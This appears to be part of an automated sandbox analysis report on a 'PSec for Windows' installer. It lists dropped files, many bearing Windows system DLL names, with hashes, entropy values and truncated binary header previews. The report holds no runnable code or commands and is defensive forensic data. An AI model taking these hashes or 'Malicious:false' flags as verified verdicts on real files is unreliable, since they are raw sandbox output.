                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):2560
                            Entropy (8bit):2.903432271168218
                            Encrypted:false
                            SSDEEP:24:eH1GS8WGJb3MxCMD5uIZW0THWokPINug9hv35WWdPPYPNyBx8:yaf2cIZWwHbuwh/5WwHgcx
                            MD5:79A58206AB9628B34FC7C38C81B68F14
                            SHA1:CDB5501DABAADD95486EB4D970C6E0608D6E2587
                            SHA-256:44A05AF87399C3B1F010DD7B07ADD2F6FE5C31780C47FC96055AE48651213ECB
                            SHA-512:35328F18C7E9F9DA652B8C5056653B7B188003007BA2426503FB00FCB49C5DF2E3288F4D028FE1784950590C9F26AC58E5794A98C5755DDA632B0DAEECCFBF73
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...([.w...........!.........................................................0............@.......................................... ..X...............................8............................................................................text...............................@..@.rsrc...X.... ......................@..@....([.w........T...8...8.......([.w........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....&.jV.^JQ.fXEY..8.J..+./is.([.w........................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\is-VK3B0.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):4.139121993350808
                            Encrypted:false
                            SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                            MD5:E32319E5947A76F8E50EC50C37906882
                            SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                            SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                            SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L.................!..............................8N.........................0......z.....@E........................`...0............ .. ...............................T............................................................................text...<...........................@..@.rsrc... .... ......................@..@...............$..........................d..........................$..................................x.......................H...............>...i...............@...z...........=...v...............5...p...............I...x...............)...Z...............*...]..........."..._...............!...P...............2...g...................................................WS2HELP.dll.WahCloseApcHelper.ws2_32.WahCloseApcHelper.WahCloseHandleHelper.ws2_32.WahCloseHandleHelper.WahClose

                            C:\Users\user\AppData\Roaming\PSecWin\kbd101b.DLL (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):3.235992661119672
                            Encrypted:false
                            SSDEEP:96:vzC1kenzketFbwXmybNcqDWrtayWwqe2WwrP:7NenzketBsKWi2Wm
                            MD5:62CCA1467B39187CA5FBFFEDE02B3895
                            SHA1:3F1C1BBB28A96522AB953C370E66C107C911201B
                            SHA-256:3D166684470988E9F73250C62AE6E7BA9194ACD2D3247AA772B8FFD4AEF10FA8
                            SHA-512:A5A903DD0DA242F0B33A5887AB204956C93A1968C409DD2DBDF433024D12C14814135475FBBFA2976BE16C25A484EC4AE11DD95DC065D5A16FE19FE2D784E836
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L.....&R...........!......................... .....R.........................@......."....@.........................P................ .. ....................0..........T............................................................................data............................... ..`.rsrc... .... ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\kbdarmty.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7168
                            Entropy (8bit):3.3223098820671386
                            Encrypted:false
                            SSDEEP:96:vQe1aIVBryn6fUuX8CMrn746XQdyNcTq0c5YW9/Ww+:oe1aIqAXsVn/XFrYW9/W
                            MD5:0625662B4B33D2A78C39366CA3E66067
                            SHA1:7F57F3A63835268F5B91F743BB9B00F759C60F99
                            SHA-256:CE7D17C4DDD3DD4C969556FF8286A01D52986D13CDD9371BE363F3BFB382C4A9
                            SHA-512:9F788AA83A52C3F487506D105F564074358D0F693D6EE2BF5358EE5E2583BA3ACF85B95E4476DE8AC6AA097DAE3724C648D6E5A5A9F22B9E6221A68E120F8F6B
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L....#.............!......................... ...............................@......Z.....@E............................T............ .. ....................0..........T............................................................................data...W........................... ..`.rsrc... .... ......................@..B.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\kbdibm02.DLL (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7680
                            Entropy (8bit):3.341098387319522
                            Encrypted:false
                            SSDEEP:48:qoQFOfuKNkpBBhXbVc1u79I+nNNKDzVUNcO1Hy0uFdbocZWPWAuVc5WwHgHq:vQh+kvbbVx9IS4DyNcO1HydFzWsAWwy
                            MD5:110BB11112903EE1BECE36BABA256754
                            SHA1:C0ABCC794F35D6AEB0A2349BAC890BC8BFC47F0A
                            SHA-256:81A6E79F3AC731BB3C7EFBDCAF18DF7662964B8E7907018B1B4551F3562F1B66
                            SHA-512:4EC8E3BF67A73141AB62DA26CE45E5DA170D994A5ECF7A99252F5B58C016B320BDA97BF9FF9AD028B45E9560FDFDE1064046695E3CE930D2EC71473027DC3379
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2...\...\...\...\...\...X...\.....\...^...\.Rich..\.........................PE..L...'a%............!.........................0.....R.........................P.......A....@..........................................0..0....................@......@ ..T............................................................................data............................... ..`.rsrc...0....0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\mcbuilder.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):80896
                            Entropy (8bit):6.243895837934394
                            Encrypted:false
                            SSDEEP:1536:U5i0hBmMsWjcdIkpk0551bBuej8LrdHNaAssqeyAiBTd9aFZBrx7WwE45:UhBGIkV71bBuEmrIsqeyAiBTdCBrpWwr
                            MD5:CAE8E531CD82401A9ECB4C446CBB964B
                            SHA1:60F23D6F5BAEA091C997DC7527C0F2896C801F6F
                            SHA-256:F5FBD701E0CEEFCAB76839231C23F29EB967AD6107520B8454C40FD8DCDDFDE1
                            SHA-512:0D87C7C6797312286AB141AF5260BA8E6A3DE98A51617AFF9F7D1DC149B239FA04E26F87B72FB7E4BC387566317C8801A62D50E953F0872A8790EB5B9D8F7932
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7..s...s...s...g...Q...g...h...g...t...s.......g...q...g.......g.|.r...g...r...Richs...........PE..L...!.......................6......0e....... ....@..........................p...........@...... ...........................A..P....P.......................`......PU..T............................!...............@...............................text............................... ..`.data........ ......................@....idata..L....@......................@..@.rsrc........P.......&..............@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\mfc140enu.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):70224
                            Entropy (8bit):5.147993943292643
                            Encrypted:false
                            SSDEEP:1536:MV9zfyEBAuhPLNXf/nWHNfdzd+zLZKzyF:Q9zlBhZxXf/nWHNdAok
                            MD5:DADB101E49A2CD1F0451AA7762D4B83C
                            SHA1:E2DDB718652E3276244F16BE562E07925ED2623A
                            SHA-256:5EE1FE1A80A2294DB5719502D1E089B0B18AB202B617157D114039789A9A396E
                            SHA-512:C16B9B52B0CB1A0CB127D040681A0381236121BA33EB2DA3AD728109EA79C0B335CAF8FB7912AF050409D0FB5690C959C9113EF26E98FBEA4E9C5BD1173AC8AA
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}Y=.98S.98S.98S.?...88S.?.Q.88S.Rich98S.................PE..L................."!...&.............................................................^....@.......................................... ..................PP..............T............................................................................text...P...........................@..@.rsrc........ ......................@..@................T...l...l...................l...........................$...,...,...........................RSDS\..V....4O(...n.....D:\a\_work\1\s\binaries\x86ret\bin\i386\\MFC140ENU.i386.pdb.........T....rdata..T........rdata$voltmd...l........rdata$zzzdbg.... ..p....rsrc$01....p1..0....rsrc$02.... ...\..V....4O(...n.....d.,t.t..............................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\netevent.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):20480
                            Entropy (8bit):3.82952728424198
                            Encrypted:false
                            SSDEEP:384:pWpSW07HJYHZSxRswpfPFx2AmfN3IsK717:EQWsxRs6EIN
                            MD5:6F47F9FF734CCE033CF391591D688046
                            SHA1:04CCC2769E17BAE55709BFCAB9AE05EAA88C3947
                            SHA-256:BD21573B6554300E6DDC77269FBE7BEB1D32A6AACAA3CC872703AA0F73E68D66
                            SHA-512:652DF8A984535103C3DBD9044E84EF2FAB3335810E3C55CCB64A4DA42F1ABC0ADCED75F8585EA2452D9DA9EE907E3CDCC8F3C9A2AF720E237BF640B77C523B03
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L................!.........N....................hD.........................p.......I....@.......................................... ...K..............................8............................................................................text...............................@..@.rsrc....K... ...L..................@..@..............T...8...8.................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!...J...rsrc$02.... ............<l.;.aJD..-.V.V............................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\netlogon.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):709120
                            Entropy (8bit):5.992581602394087
                            Encrypted:false
                            SSDEEP:12288:8myV/tTB9ef3BvRy9NNPI0+DCksfBzu9KRAAJ3jqG3nSgrfhbeqLf:vyFt3efBvRy9NNPItCkGuqLRjx3nSgLN
                            MD5:B0027D5280E1D7EFFC0B9A1E94A6F94C
                            SHA1:6762909AEA5F77A0F7818DFA1BB0E2208732BAFD
                            SHA-256:E06519F29B149D64D534A19FA1F6A31066F4B68FB700CEDB4FB0A9921D79EBBD
                            SHA-512:04EC97501B91D342DCEF34C9AD3ABEEB477B72ADEFA574F10650E886EC011120BE7C5574EF02489FD3CE0F51FE6F2DE0D9AE6FD83A3FBB077DC0985A920755AA
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+..J...J...J...!...J...2...J...J...L...!...J...!...J...!...J...!...J...!...J...!}..J...!...J...!...J..Rich.J..................PE..L.....c............!................pw.............P.........................0............@A........................P...:....G..`................................a......T............................................@..........@....................text............................... ..`.data....*..........................@....idata...C...@...D..................@..@.didat..d............X..............@....rsrc................\..............@..@.reloc...a.......b...p..............@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\networkhelper.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):100352
                            Entropy (8bit):6.268429975218522
                            Encrypted:false
                            SSDEEP:1536:thDj/y2ObZIxMoYye97D4nWkbT5+yYWZO6T5rEBzEzw/QGowH/OmGr:vDjrOYjeFD4nWm5+yjT6dNYUOZ
                            MD5:86AB2A500D974CBBC20EE7FA1F408CEC
                            SHA1:E540DC889F98CC042A53FE67F0D935C675A55D4F
                            SHA-256:6F055C097B986ACDEC861247120C8281C7C67FF5BED40F58E2E921F70E5C6E7A
                            SHA-512:4E7F6D2BEE39D52F4961DD503EE7F7429020EE4AEAF89B0FC18BD7F6615568DAA656A12B1CDED4893452A40C392D196CF3894E0DA8CC0BAD90F9B5DDB767B593
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........2..ea..ea..ea...a..ea..f`..ea..a`..ea..da%.ea..d`..ea..e`..ea..l`..ea..``..ea...a..ea..g`..eaRich..ea........PE..L.....dp...........!.....(..........0$.......@......................................&.....@A.........................3..x...hr.......................................7..T...........................(................p..d....0.......................text...(&.......(.................. ..`.data....'...@.......,..............@....idata.......p......................@..@.didat..P............D..............@....rsrc............0...F..............@..@.reloc...............v..............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exe

                            Download File
                            Process:C:\Users\user\AppData\Roaming\PSecWin\7z.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                            Category:dropped
                            Size (bytes):4056240
                            Entropy (8bit):7.97002360834342
                            Encrypted:false
                            SSDEEP:98304:QsSoMQnPLeMNCvYa59QKS7XnqSsAVlsX4pIDmjjcrhm2NGbUU:QsSByeMj04VlslQsm2NK
                            MD5:01EF58E7C144C701B2EA01CFC049DBE4
                            SHA1:2F572ACCB519096C9EA805812BA53703C16CCEEA
                            SHA-256:AE5B66322E5A7C26AD21CCC556BDC1618796166565D2939142C5AA3D76C38ACE
                            SHA-512:434FD6D4EB49669617DA3A15C2239A2CF524624CC4FCF9F09D8BB78A40DDF2DC5E70105E6708CE7643448F3176301EDD64A9B71244C179A836119532D7DD69A6
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................... .......L>...@..........................................P..X...........(.=..)...........................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata.......`...........................rsrc...X....P......................@..@................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\rdvgocl32.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):183296
                            Entropy (8bit):6.493584105087857
                            Encrypted:false
                            SSDEEP:3072:0uv++PiLzpzMdxVP38TyqaOVhWedhOC3Vn4fry43/N:0YfPkpzM9PSzWeWCln8j
                            MD5:064C2ABC579277DD94259D5F985C4FD4
                            SHA1:75BD2A45E9FB320A303FCD81E894D96EDAF7CBCB
                            SHA-256:449F0431E5C6FAE736A2E367818813F279B41BA32A3979EE6D1359EC4DFC3BFE
                            SHA-512:7D62A88437662EF9A3D5D552E43D5B8A1641FFF8ACF70B327CA7D18EA806298E38E8B4B4BBA0C1697D9B74A14C23D74E49914CDC656061E01F95C3FB737C27FD
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H.&...&...&.......&...%...&..."...&...'..&...'...&...#...&...&...&.../...&......&...$...&.Rich..&.........PE..L....{.............!.........H......0A...................................................@A................................t...................................l)...?..T...................t...........................p............................text............................... ..`.data...D...........................@....idata..>...........................@..@.rsrc...............................@..@.reloc..l).......*..................@..B........................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\runonce.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):47104
                            Entropy (8bit):6.2437778672689985
                            Encrypted:false
                            SSDEEP:768:A686/iNXC+tFbpTSRkg3AAdYn7AJUeuFRseJgvDwzcQx8Z499:Av6/iNXXDuX7meUeuFKrvcJaZ49
                            MD5:7801A2F01B7F0163DA0088B1E666A573
                            SHA1:C4D91352CFA440C2EC7018A412B8C3DABC0DC905
                            SHA-256:62B4D125AE01FD97C91AFC55238E15D643CC4DB92F990D9D5C40C0C62FA270F3
                            SHA-512:992CA7A0E75E7AC64AA43040C98A32C50566376F754B8EEA08993F235D816DDF6C9A97FB221C01230C26AF6ACC3113DC7C0541FBE011BCA1A947F32BCA93ABEE
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.2.g.\.g.\.g.\.n...K.\.s.X.q.\.s.Y.b.\.s._.d.\.s.].r.\.g.]..\.s.T.s.\.s..f.\.s.^.f.\.Richg.\.........................PE..L...M........................:...... .............@.................................K.....@...... ......................................x............................#..T...............................................|............................text............................... ..`.data...$...........................@....idata..8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\shrpubw.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):46080
                            Entropy (8bit):5.996220242040934
                            Encrypted:false
                            SSDEEP:768:NXfEQgbKXSjjj/fAU7kpcyiPhZkbzKKkv6H+WnfFV6gWpMUt56Xf5rvZ/qWyIV6H:WVz/vOOsRzUyRR/q2upZm48
                            MD5:539063395EFBB5480C0AC13CC9E5FB16
                            SHA1:772038B6EDE76831AC02444CCD826089283FE0C0
                            SHA-256:18F9DF881FFEB43EBF558CB5BFC2B40BB64E54A2DEE391B79CEBB10173FB41EB
                            SHA-512:7D4CBE926EA364DAFCB7283AC78658ADC0DEE14BF41F1CD584975EA206C90511B155266B554D96175C24B3758DDFB40226BDB53C6EC9BACAC84C654C0A854550
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5...q..q..q..x.).s..e...p..e...h..e...v..e...h..q..q..e...z..e.E.p..e...p..Richq..........PE..L.....K..................|...8......pu............@.................................v.....@...... ..........................4...........h............................$..T...............................................0............................text....{.......|.................. ..`.data...,...........................@....idata..j...........................@..@.rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\socialapis.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):108544
                            Entropy (8bit):6.242701983451339
                            Encrypted:false
                            SSDEEP:1536:YFQ53HD5Wp6WgjJqie+qR5i29VLlsB32YUwAtF0MBJbTmXJ:I43D7ci2LXL6B32YUwO0MLbTmX
                            MD5:7AB4616DE5856615CA9E0D1FCD01FAD0
                            SHA1:36AA0E0F0547AA1B64EC8B2A95EC93518A766163
                            SHA-256:A0CE5F7D716E881A596332D7ECDC0BC8AAA89FDE9D1BF1B78F3152A3920CD987
                            SHA-512:438EB34699F339AB3C11861BB9B86DCBDBA0C604E43240CD433C7DE3814F1C36D61C54900F034CCBE62B30D419C61A78567E33761A99E42CFC50724CD0F9CE1C
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y8...k...k...k..k...k..j...k..j...k...k^..k..j...k..j...k..j...k..j...k..k...k..j...kRich...k........................PE..L...D..............!.....B...f......@=.......`............................................@A.........................P.......q...........2..........................@P..T............................,...............p.......K.......................text...OA.......B.................. ..`.data... ....`.......F..............@....idata.......p.......H..............@..@.didat...............V..............@....rsrc....2.......4...X..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\sscore.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):37376
                            Entropy (8bit):5.916839934179735
                            Encrypted:false
                            SSDEEP:768:VP+MF9uXFkzxt8xJ0ltub+aTOV6GndP4Nm5f:VNumn8xJga294Ny
                            MD5:83D97778953F5A1A93EA93E644273DC7
                            SHA1:2E86AF4B2BA1D5F5B94B331218B46C6EC9504AE3
                            SHA-256:26A413AB3FDA517896723362E32BCF91EE421D35AA72F5059CF652BB05173F32
                            SHA-512:57E46B3F78887B37480AA041E09B3E08BA4ABD42600B7EE12FE77F2222452431466759BB4F3577C3FB6BF816530C227CFBAADBDB7ADC8C145468B38A7304591F
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!..O...O...O...N...O......O...N...O...L...O...K...O...O...O...B...O...J...O.......O.......O...M...O.Rich..O.........................PE..L....zZh...........!.....n...$.......(..............................................[_....@A.........................u..F...\...................................D.......T...............................................X...\p.......................text...6l.......n.................. ..`.data................r..............@....idata...............t..............@..@.didat..............................@....rsrc...............................@..@.reloc..D...........................@..B........................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\tapiui.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):2560
                            Entropy (8bit):2.903432271168218
                            Encrypted:false
                            SSDEEP:24:eH1GS8WGJb3MxCMD5uIZW0THWokPINug9hv35WWdPPYPNyBx8:yaf2cIZWwHbuwh/5WwHgcx
                            MD5:79A58206AB9628B34FC7C38C81B68F14
                            SHA1:CDB5501DABAADD95486EB4D970C6E0608D6E2587
                            SHA-256:44A05AF87399C3B1F010DD7B07ADD2F6FE5C31780C47FC96055AE48651213ECB
                            SHA-512:35328F18C7E9F9DA652B8C5056653B7B188003007BA2426503FB00FCB49C5DF2E3288F4D028FE1784950590C9F26AC58E5794A98C5755DDA632B0DAEECCFBF73
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.................PE..L...([.w...........!.........................................................0............@.......................................... ..X...............................8............................................................................text...............................@..@.rsrc...X.... ......................@..@....([.w........T...8...8.......([.w........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....&.jV.^JQ.fXEY..8.J..+./is.([.w........................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\unins000.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:InnoSetup Log PSec for Windows, version 0x418, 19497 bytes, 506407\37\user\37, C:\Users\user\AppData\Roaming\PSecWin\37
                            Category:dropped
                            Size (bytes):19497
                            Entropy (8bit):3.813890475373084
                            Encrypted:false
                            SSDEEP:192:51ConPjXID+4Yu1A1aJ7RCBdeCUyYbP4DSmL5czuGHH:5jnOYu1A167sUyYbPIL5pGHH
                            MD5:FC66C2D94A51710D96385C2B29936E21
                            SHA1:8378670FD21790460E546C5149FC0A7E0348AE5C
                            SHA-256:163A84AEA12408F01F3B6963682EE542437F3A57E9C797B732402EC886B2CF17
                            SHA-512:FBDAF089D7395EF0EF9777117F10CAB54F693588A6A9C88E4A51FE4E170BAFBEB3C4456468D583A298FDE2E7E11EFCBDEA239481AC67A85E087344DB32625FB0
                            Malicious:false
                            Preview:Inno Setup Uninstall Log (b)....................................PSec for Windows................................................................................................................PSec for Windows....................................................................................................................5...)L....................................................................................................................O.........g................5.0.6.4.0.7......a.l.f.o.n.s......C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.P.S.e.c.W.i.n................:...8.. ......-...6...IFPS....'... ....................................................................................................ANYMETHOD.....................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TMAINFORM....TMAINFORM.........TUNINSTALLPROGRESSFORM....TUNINSTALLPROGRESSFORM....................F....IDISPATCH.............!OP

                            C:\Users\user\AppData\Roaming\PSecWin\unins000.exe (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3244605
                            Entropy (8bit):6.3002173620753625
                            Encrypted:false
                            SSDEEP:49152:2dx4HDQNJL0VR6SgMt+k4RiP+RmXMjiINiMq95FoHVHNTQTEjy333zmgx:XHDYsqiPRhINnq95FoHVBy333C0
                            MD5:83B9079153811D0B853865E88245FBE4
                            SHA1:AEF31BEF95CB3B0126F7981837D53932CBBF4C1E
                            SHA-256:5AECCD5D782A518E35FA5227893C982AD69A5DD87F5D683E036DB34E05B471F1
                            SHA-512:58ECDD1CCD28020DBA7596E52DCC37B77896A807F2B69183A3B0E71B03E7C44187CEE5034F9B5E9474308D7C35D5EF47A0E2ED5FAE3FA446D51CC48D9C089D5C
                            Malicious:false
                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...oGXb.................B,.........`V,......`,...@...........................2...........@......@....................-.......-..9............................................................-.......................-.......-......................text.....,.......,................. ..`.itext...(...0,..*....,............. ..`.data........`,......F,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-...... -.............@..@.rsrc................"-.............@..@..............1.......0.............@..@........................................................

                            C:\Users\user\AppData\Roaming\PSecWin\verifier.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):360144
                            Entropy (8bit):5.661023715516949
                            Encrypted:false
                            SSDEEP:3072:jCuEydZX7mwKR4L5QprdZvh+h9H7WwfNfZ/CTla1nSrm9W0fQx78qYFQxV3Zsd8+:9EYZXqwKR4lQpr/GDCk3fQxUt9+C
                            MD5:B08196E5863137C12CA5BF166F16AAC7
                            SHA1:A5EEDE1F86B4DBF8EB920FA4B74C03FFAA19847C
                            SHA-256:2379C89382789238DCAE1433C04EEB861A2AB72955EC67D7554F4889AF2788C3
                            SHA-512:ACAB6898ADB05CFD15A60B5248AD4E4C4763EB30BF32A872FE05E2FE29D663E37B7DFC812A5AA66D300AFF3178F045F10A3EA4231DD6B41BFC8BBDFDC6E7C3F4
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ F..A(..A(..A(..*+..A(..*)..A(..A).BA(..*,..A(..*(..A(..* ..A(..*...A(..**..A(.Rich.A(.................PE..L....C1............!.........t...............................................P............@A...........................B...h...(.......`............P....... ..L+...^..T...........................(...................`............................text............................... ..`.data.... .......\..................@....idata..8...........................@..@.rsrc...`...........................@..@.reloc..L+... ...,...$..............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\wiashext.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):67072
                            Entropy (8bit):6.314142155382167
                            Encrypted:false
                            SSDEEP:1536:St/KlpLMTc3WRyIdA2rS7D4NrOI4wlzgB5VdtXgDF3:NLMo3WRyIiwI4kggB5VdtXgDF
                            MD5:0195F2ACF32E1ECDC5AF0E3CF5184373
                            SHA1:993CD3216F983B6D1711CCE77976C71E1B7D6F9E
                            SHA-256:51B3F3BA1A7ABD58BED2C9E9EF67C39592FE585699EFBFE157308AF86F6930CC
                            SHA-512:E922C14E20072993B67DDE391F821E2E58C52D58AE7B194BB999B97C33637FF44597D005ED8E54495D87A4977E3954F00AD07971840115FF9E9343562BB98812
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........S..S..S..G...R..G...\..S.....G...@..G...Q..G...R..G...D..G.e.R..G...R..RichS..................PE..L.................!.........0.....................w.........................@............@A........................p...9...H........ ..P....................0..(....!..T........................... ...................D.......`....................text............................... ..`.data...............................@....idata..T...........................@..@.didat..(...........................@....rsrc...P.... ......................@..@.reloc..(....0......................@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\wlanext.exe (copy)

                            Download File
